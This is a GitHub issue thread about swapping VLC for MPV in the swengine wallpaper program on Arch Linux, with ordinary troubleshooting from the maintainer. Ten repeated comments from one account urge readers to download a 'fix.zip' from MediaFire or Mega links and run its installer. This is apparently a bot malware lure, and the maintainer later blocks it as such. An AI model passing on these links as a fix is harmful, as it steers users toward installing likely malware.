### ISSUE TITLE
Any chance of using MPV instead of VLC?

### ISSUE THREAD

**Issue by simplemachine-zz** [Eugenenoble2005/swengine#1]
It's just a doubt, because I don't use VLC. is it possible? or maybe another way as long don't need to use VLC at all?

**Comment by Eugenenoble2005** [comment]
It just needs vlc installed to run the embeded player. What distro are you on? if you are on debian you can install only libvlc-dev for the vlc headers. You will not need to install vlc desktop.

**Comment by simplemachine-zz** [comment]
Arch Linux

**Comment by Eugenenoble2005** [comment]
Arch linux unfortunately does not have libvlc-dev in the package repos. If you want to use this program, you'll have to install vlc desktop. Another option is to use:
```
yay -S swengine --editmenu
```

Edit the PKGBUILD and remove the vlc dependency and try to install it that way. Best case scenario the program works fine but you wont be able to preview the wallpapers. Worst case scenario the program crashes when you try to preview a  wallpaper. Good luck.

**Comment by simplemachine-zz** [comment]
Unfortunately it doesn't work without VLC (The program crashes) but thanks for the help. The program icon is empty, is this normal or will it be added in the future? And just to let you know that the wallpaper only worked for me after installing `libva-nvidia-driver` on Arch Linux. Looking forward to future updates, cheers!

**Comment by Eugenenoble2005** [comment]
I was too lazy to make a program icon lol. Perhaps in future updates.  Are you using hyprland maybe?

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by simplemachine-zz** [comment]
> I was too lazy to make a program icon lol. Perhaps in future updates. Are you using hyprland maybe?

Yes. im using hyprland.

what are those download links spam?

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Eugenenoble2005** [comment]
> > I was too lazy to make a program icon lol. Perhaps in future updates. Are you using hyprland maybe?
> 
> Yes. im using hyprland.
> 
> what are those download links spam?

Bots. Blocked them.
